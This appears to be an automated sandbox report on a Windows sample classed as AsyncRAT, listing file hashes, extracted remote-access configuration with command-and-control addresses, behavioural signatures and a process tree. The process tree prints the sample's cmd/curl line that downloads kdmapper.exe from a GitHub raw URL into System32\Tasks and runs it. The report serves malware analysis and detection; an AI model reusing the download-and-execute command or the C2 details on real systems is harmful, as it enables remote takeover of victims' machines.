Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 05:17
Static task
static1
Behavioral task
behavioral1
Sample
0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe
Resource
win7-20240729-en
General
-
Target
0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe
-
Size
573KB
-
MD5
c39b2855ca915b631eda59221242a492
-
SHA1
0e8c5d616d5cf17b0dcc891044e67770d1b8f28c
-
SHA256
0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31
-
SHA512
a209d2fb399fd847197d8f901222d45a93a76868081dcce0d91ad2ed618e15b5d5b88ff0db2534b280d469e082fba11abbe4e10c53d9af09a6a2eda7fb0a481b
-
SSDEEP
12288:gD+ImWu7YOwR+7Wq+kIN0xkGtxCtq30JCSHvi7oA:gDKWu/w47WRoxkG7Cs30pi71
Malware Config
Extracted
asyncrat
1.0.7
Default
127.0.0.1:2035
147.185.221.16:2035
147.185.221.19:2035
121637121.duckdns.org:2035
I8EJ82H739UG
-
delay
1
-
install
true
-
install_file
Update.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023c83-2.dat family_asyncrat -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1596 kerneldat234.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 raw.githubusercontent.com 5 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\Tasks\kerneldat234.exe curl.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 728 wrote to memory of 3884 728 0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe 84 PID 728 wrote to memory of 3884 728 0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe 84 PID 3884 wrote to memory of 2340 3884 cmd.exe 85 PID 3884 wrote to memory of 2340 3884 cmd.exe 85 PID 3884 wrote to memory of 1596 3884 cmd.exe 86 PID 3884 wrote to memory of 1596 3884 cmd.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe"C:\Users\Admin\AppData\Local\Temp\0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/Vane.cc-Skar-Fortnite-self-leak/main/um/AUTH/kdmapper.exe --output C:\Windows\System32\Tasks\kerneldat234.exe >nul 2>&1 && C:\Windows\System32\Tasks\kerneldat234.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/SkarSys/Vane.cc-Skar-Fortnite-self-leak/main/um/AUTH/kdmapper.exe --output C:\Windows\System32\Tasks\kerneldat234.exe3⤵
- Drops file in System32 directory
PID:2340
-
-
C:\Windows\System32\Tasks\kerneldat234.exeC:\Windows\System32\Tasks\kerneldat234.exe3⤵
- Executes dropped EXE
PID:1596
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD5a64c195587c96e2d3dabe451e7ebb496
SHA156b34ea8794487287f4d13708c56e46012417e9b
SHA256f879d638d1ff0dd11471d38f62361315bb43b77d3605ec9ff67b149f435dadcc
SHA512b9b600898e094832cd598182002fddab9506166fc9104994651aa83b8c96f7339901fec258978ecaafce393ac6c453280ccf22061b40839703d1760a6f3108cd